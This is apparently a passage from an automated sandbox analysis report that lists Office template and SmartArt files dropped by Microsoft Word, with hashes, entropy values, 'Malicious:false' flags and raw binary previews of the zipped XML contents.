                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):5630
                                                                                      Entropy (8bit):7.87271654296772
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                      MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                      SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                      SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                      SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                      Malicious:false
                                                                                      Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):256
                                                                                      Entropy (8bit):3.4842773155694724
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                      MD5:923D406B2170497AD4832F0AD3403168
                                                                                      SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                      SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                      SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):11380
                                                                                      Entropy (8bit):7.891971054886943
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                      MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                      SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                      SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                      SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):238
                                                                                      Entropy (8bit):3.472155835869843
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                      MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                      SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                      SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                      SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5151
                                                                                      Entropy (8bit):7.859615916913808
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                      MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                      SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                      SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                      SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                      Malicious:false
                                                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):242
                                                                                      Entropy (8bit):3.4938093034530917
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                      MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                      SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                      SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                      SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):4888
                                                                                      Entropy (8bit):7.8636569313247335
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                      MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                      SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                      SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                      SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                      Malicious:false
                                                                                      Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):3.5502940710609354
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                      SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                      SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                      SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):270198
                                                                                      Entropy (8bit):5.073814698282113
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                      MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                      SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                      SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                      SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):260
                                                                                      Entropy (8bit):3.4895685222798054
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                      MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                      SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                      SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                      SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3075
                                                                                      Entropy (8bit):7.716021191059687
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                      MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                      SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                      SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                      SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                      Malicious:false
                                                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):254
                                                                                      Entropy (8bit):3.4721586910685547
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                      MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                      SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                      SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                      SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4243
                                                                                      Entropy (8bit):7.824383764848892
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                      MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                      SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                      SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                      SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                      Malicious:false
                                                                                      Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):256
                                                                                      Entropy (8bit):3.464918006641019
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                      MD5:93149E194021B37162FD86684ED22401
                                                                                      SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                      SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                      SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):51826
                                                                                      Entropy (8bit):5.541375256745271
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                      MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                      SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                      SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                      SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                      Malicious:false
                                                                                      Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):374
                                                                                      Entropy (8bit):3.5414485333689694
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                      MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                      SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                      SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                      SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):47296
                                                                                      Entropy (8bit):6.42327948041841
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                      MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                      SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                      SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                      SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                      Malicious:false
